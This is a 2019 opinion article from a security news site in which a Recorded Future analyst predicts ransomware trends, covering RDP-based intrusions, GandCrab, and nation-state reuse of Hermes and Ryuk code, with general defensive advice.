SecurityBrief Asia logo
Asia's leading source of cybersecurity and cyber-attack news
Story image

Opinion: 4 Ransomware trends to watch in 2019

By Contributor
Thu 14 Feb 2019
FYI, this story is more than a year old

Article by Recorded Future senior solutions architect Allan Liska

At the end of each year for the last two years, I have written articles predicting trends in ransomware for the next coming year. Each article was a mix of accurate and inaccurate predictions — fortunately, more accurate than inaccurate.

In 2018, the division between the “haves” and “have nots” of ransomware campaigns continued to grow. The “haves” — ransomware actors who continued to make a lot of money and successfully exploit many targets — focused on health care and government (or quasi-government agencies) and these actors avoided traditional phishing or web exploitation campaigns.

The biggest ransomware story of 2018, arguably, happened in the city of Atlanta. The SamSam team hit the city hard, disrupting vital services for days and leaving some data completely unrecoverable. But Atlanta wasn’t the only city or state government hit. There were dozens of stories about cities, utilities, ports, and more that were infected with ransomware in 2018.

Since ransomware attacks continue to challenge all types of organisations (and not just health care and government), here are the anticipated trends in ransomware for 2019.

1. The ransomware market will continue to grow, but few campaigns will have impact

In January of 2017, Recorded Future was tracking 635 ransomware campaigns. In February of 2018, that number was 1,105, and at the end of January 2019, we are tracking 1,463 campaigns. While the number of ransomware variants continues to expand rapidly, the truth is that most of these campaigns are ineffective and die out quickly.

An example of this phenomenon is the Cryptgh0st ransomware shown below. It was first discovered in May 2018 and by the end of August, virtually all mentions of the ransomware disappeared. Cryptgh0st does not appear to have been widely deployed on victim machines, and the Bitcoin wallet associated with the campaign only shows two incoming transactions — one for about $370 and a second for $6.

There are dozens of ransomware campaigns that follow a similar pattern, where the biggest noise comes from the fake “how to remove X ransomware” websites, but they generate very little real threat.

2. Successful ransomware campaigns will continue to rely on open RDP

Most successful campaigns in 2018 involved ransomware that relies on open Remote Desktop Protocol (RDP) servers as the initial access point. Ransomware families such as SamSam, BitPaymer, and CrySiS thrived, whereas other campaigns failed because they did not rely on web exploitation or phishing to gain access to victim networks.

These campaigns look for networks that have internet-facing servers running the RDP service. Attackers either take advantage of well-known vulnerabilities in unpatched servers or use a brute-force password attack (trying common login names, such as “administrator,” along with thousands of common passwords to gain access). Once the attackers have successfully gained access to the exposed system, they use it as a jumping off point into the core of the network, installing their ransomware onto target machines and often disabling backups and other protections.

Of course, it’s not just RDP that these attackers use. As seen with SamSam, CrySiS, and BitPaymer, attackers look for any service that may give them access to the core of the network. JBoss, FTP, and other services have all been targets of these groups, but open RDP servers are the preferred target because there are a lot of them, they are easy to find, and they are easy to exploit. Even better, if an attacker is having trouble exploiting open RDP servers, they can just purchase access on underground markets for about $15, as shown below.

Publicly accessible RDP servers are widely available for a couple of reasons. The first is that many organisations use RDP instead of a VPN to gain remote access to their work or home machines. The second reason is that often organizations are not aware that the RDP service is running on internet-facing servers. This could be a configuration error, a failed security check, or it could be started by another service after the server is deployed.

It is worth noting that with the recent takedown of the xDedic marketplace, the pool of readily available, low-priced, RDP servers may be in short supply, at least until a new dominant marketplace emerges. That won’t slow down the more sophisticated ransomware teams who scan and infect their own RDP servers, but it may impact some of the less sophisticated campaigns.

Almost every headline-grabbing ransomware story in 2018 involved criminals who accessed the victim networks through a poorly secured RDP server, as shown in the timeline below. Note how the trend line stayed consistent throughout the year. Expect that to continue into 2019, at least until organisations figure out how to secure or remove their RDP servers.

3. GandCrab will continue to ignore this list and somehow be successful

The exception to the first two trends on this list continues to be GandCrab ransomware — one of the few widely deployed ransomware campaigns. The GandCrab team eschews RDP for phishing and exploit kit-based campaigns. GandCrab ransomware was first reported at the end of January 2018, and since then, the team behind GandCrab has made dozens of adjustments and at least five new code releases.

The GandCrab team is very responsive to security researchers, often including references to reports about their ransomware and how the team has adapted to those reports in their underground ads. Delivered primarily via phishing campaigns (though they also use exploit kits), the GandCrab team relies heavily on Microsoft Office macros, VBScript, and PowerShell to avoid detection, but will often incorporate new means of exploitation and avoidance as proof-of-concept code is released.

GandCrab uses a ransomware-as-a-service (RaaS) model to maximise delivery and focuses primarily on consumer delivery, with ransom demands ranging from $500 to $600. Although consumer tools such as free mail services and anti-virus vendors have gotten better at detecting ransomware, GandCrab continues to find success, as shown in the timeline below.

The team behind GandCrab doesn’t appear to be slowing down at all, so expect to see more from them in 2019.

4. Nation-states and cybercriminals will continue to blend ransomware attacks

2018 saw the rise of nation-state threat actors using cryptocurrency mining and ransomware campaigns as a way to generate revenue for the state or distract from other activities. Ransomware was not only used as a distraction or destruction tool, but also as a money-making tool.

This trend will continue in 2019, especially with countries that are heavily sanctioned — however, the twist is that these countries will use the same ransomware tools that the criminals are using so that they blend in with all of the other campaigns.

As shown in the timeline below, Hermes ransomware was originally marketed on Russian forums and used by cybercriminals. The Lazarus group, which is linked to North Korea, has also used the Hermes ransomware in at least one attack.

When Ryuk ransomware first appeared in late 2018, many researchers assumed it was tied to North Korea as well because Ryuk ransomware shares much of its code base with Hermes ransomware. However, further research determined that the Ryuk actors are most likely located in Russia and they had built Ryuk ransomware using (most likely stolen) Hermes code.

As ransomware actors become more sophisticated, the code stealing (or sharing) will become a two-way street, and nation-state actors may very well use cybercriminal code to build their ransomware variants.


One thing that has held true through the rise, the plataeu, and slipping of ransomware campaigns is that the most successful ransomware actors are very nimble and quickly adapt their techniques to the changing security landscape.

Many organisations have put in phishing countermeasures and are still cautioning those users on their network to watch for phishing-based ransomware attacks. This is not necessarily bad advice, but as successful ransomware actors migrate to other means of access, these protections become less effective against ransomware.

Just as ransomware teams adjust their attacks based on the changing security landscape, security teams need to be able to adjust their focus and protections. Understanding what techniques are being used by ransomware actors allows security teams to be more responsive to the current threats and adapt their protections to keep their organisation safe.

Related stories
Top stories
Story image
Third-party automotive apps bear significant privacy risks
Mobile applications for connected cars provide various features to make life easier for motorists, but they can also be a source of risk.
Story image
Fortinet introduces self-learning AI in latest offering
Fortinet is introducing self-learning AI capabilities in its new network detection and response offering, FortiNDR.
Story image
What every CISO must answer to enable a best-in-class security operations program
It has been widely reported recently that South Australian government employees have been the victims of a cyberattack.
Story image
Identity and Access Management
The post-pandemic workforce requires secure IAM capabilities
HID Global discusses what identity and access management means for organisations in today's convoluted digital world.
Story image
Artificial Intelligence
Gartner reveals top three tech trends for banks this year
Gartner says generative artificial intelligence, autonomic systems and privacy-enhancing computation are gaining traction in banking and investment services.
Story image
Customer experience
Gartner recognises Okta for abilities in Access Management
Okta has announced it has been recognised as a Customers' Choice for the fourth time in a row in the Gartner Peer Insights "Voice of the Customer" report.
Story image
Data Protection
Barracuda launches new capabilities for API Protection
"Every business needs this type of critical protection against API vulnerabilities and automated bot attacks," Barracuda says.
Story image
Data backup plans inadequate, data still at risk - study
The Apricorn 2022 Global IT Security Survey revealed that while the majority organisations have data backup plans in place, data for many are at risk.
Story image
Managed service provider
Barracuda MSP Day 2022 highlights MSP opportunities
Barracuda Networks has released a report showing global services-related MSP revenue is set to increase by more than a third in 2022 compared to 2021.
Story image
New Relic
New Relic launches vulnerability management platform
New Relic has introduced New Relic Vulnerability Management to help organisations find and address security risks faster and with greater precision.
Story image
NT selects Radware to improve telecom cyber defenses
National Telecom Public Company (NT) has chosen Radware to strengthen the cyber defences of its international telecommunications infrastructure.
Story image
Ransomware hits 65% of organisations in Singapore
Next-generation cybersecurity firm Sophos has released its annual survey and review of real-world ransomware experiences in the State of Ransomware 2022.
Story image
Asia Pacific plagued by sophisticated bad bots - report
The three most common bot attacks were account takeover, content or price scraping, and scalping to obtain limited-availability items.
Story image
Cybersecurity prompts upgrade for 1.3 billion electricity meters
ABI Research finds Advanced Metering Infrastructure (AMI) and cybersecurity concerns are prompting the upgrade of 1.3 billion electricity meters by 2027.
Story image
Qualys updates Cloud Platform solution with rapid remediation
The new update is designed to enable organisations to fix asset misconfigurations, patch OS and third-party applications, and deploy custom software.
Story image
Infosec unveils role-guided cybersecurity training roadmaps
Infosec Skills Roles maps hands-on training and certifications to the 12 most in-demand cybersecurity roles to maximise training efficiency.
Story image
New vulnerabilities found in Nuspire’s Q1 2022 Threat Report
“Threat actors are quickly adjusting their tactics and these exploits tend to get industry attention, but the threat posed by older and attacks still persists."
Story image
More than 40% of banks worried about cloud security - report
Publicis Sapient's new report finds security and the lack of cloud skills and internal understanding of business benefits are big obstacles for banks moving to the cloud.
Story image
APAC ranks third-highest region targeted by ransomware
Asia Pacific has ranked the third-highest region globally to be targeted by ransomware, according to cybersecurity firm Group-IB.
Story image
Accenture - a collective security approach a driving factor for cyber resilience
With the approaching Davos World Economic Forum upon us, it is even more imperative to discuss the impact of cybersecurity on business operations leading into the future.
Story image
Silver Peak
The path to an adaptive, modern network
Managing and securing the network looks different than it did just two years ago—especially given that most of these networks are made up of multi-generations of infrastructure stitched together over time.
Story image
Vishing attacks reach all time high - Agari and PhishLabs
"Hybrid vishing campaigns continue to generate stunning numbers, representing 26.1% of total share in volume so far in 2022."
Story image
Noname Security partners with Netpoleon to target API issues
Specialist API security firm Noname Security has appointed Netpoleon as its distributor in Australia and New Zealand.
Story image
Cloud Security
Aqua Security createa unified scanner for cloud native security
“By integrating more cloud native scanning targets into Trivy, such as Kubernetes, we are simplifying cloud native security."
Story image
i-PRO releases smallest AI-based surveillance camera on the market
The new i-PRO mini network camera is now available, with a pocket-sized form factor and full AI analytics functionality.
Story image
Employees on the frontline of cyber defense - report
In the first quarter of 2022, employees found themselves more than ever at the frontline of cyber defense, according to a new report from Kroll. 
Story image
Remote Working
Successful digital transformation in the hybrid work era is about embracing shifting goalposts
As organisations embraced remote working, many discovered they lacked the infrastructure needed to support history’s first global load test of remote work capabilities.
Find out how you and your business can prevent being caught out by everything from ransomware to cryptojacking.
Link image
Story image
Tech job moves - Forcepoint, Malwarebytes, SolarWinds & VMware
We round up all job appointments from May 13-20, 2022, in one place to keep you updated with the latest from across the tech industries.
Story image
Elevation of Privilege the top 2021 Microsoft vulnerability
BeyondTrust has released its 2022 Microsoft Vulnerabilities Report, finding that Elevation of Privilege is the top vulnerability category for the second consecutive year.
Story image
Global cybersecurity insurance market worth $11.5b this year
Future Market Insights finds the cybersecurity insurance market is expected to reach USD$11.5 billion in 2022, growing to $61.2 billion in 10 years.
Story image
Sift shares crucial advice for preventing serious ATO breaches
Are you or your business struggling with Account Takeover Fraud (ATO)? One of the latest ebooks from Sift can provide readers with the tools and expertise to help launch them into the new era of account security.
Story image
APAC organisations fail to disclose ransomware breaches
85% of organisations in APAC were breached by ransomware at least once in the past five years, but only 28% publicly disclosed the incident.
Story image
BYOD / Bring Your Own Device
How zero trust can lead the battle against ransomware
SecOps teams champion a zero trust strategy to support the fight against the escalating risk of cybercrime and help monitor threat actors across a network.
Story image
Data Protection
Information management capabilities to meet privacy requirements
Organisations with customers or operations across more than one country face a spate of new and proposed privacy and data protection laws.
Story image
Nozomi Networks
Nozomi Networks, Siemens reveal software integration
Nozomi Networks and Siemens have extended their partnership by embedding Nozomi Networks’ software into the Siemens Scalance LPE local processing engine.
Story image
'Alarming' rise in ransomware threats - Verizon report
As criminals look to leverage increasingly sophisticated forms of malware, it is ransomware that continues to prove particularly successful.
Story image
Sysdig unveils new Kubernetes troubleshooting and cloud innovations
Sysdig has introduced two new innovations that look to help bolster cloud services and simplify Kubernetes troubleshooting.
Story image
ChildFund launches new campaign to protect children online
ChildFund says WEB Safe & Wise aims to protect children from sexual exploitation and abuse online while also empowering them to become digitally savvy. 
Story image
Amazon Web Services / AWS
RedShield leverages AWS to scale cybersecurity services
"Working with AWS gives RedShield the ability to mitigate significant application layer DDoS attacks, helping leaders adopt best practices and security architectures."
Story image
Ponemon Institute
Email revealed to be riskiest channel for data loss
More than half (60%) of organisations experienced data loss or exfiltration caused by an employee mistake on email in the last 12 months.
Story image
Trojan cyber attacks hitting SMBs harder than ever - Kaspersky
In 2022 the number of Trojan-PSW detections increased by almost a quarter compared to the same period in 2021 to reach 4,003,323.
Story image
Check Point
Check Point and CCTV expert join forces to boost protection
The partnership will involve Check Point Quantum IoT Protect Nano Agent being embedded in Provision-ISR’s CCTV cameras for on-device runtime protection.
Story image
Rubrik Security Cloud marks 'next frontier' in cybersecurity
"The next frontier in cybersecurity pairs the investments in infrastructure security with data security giving companies security from the point of data."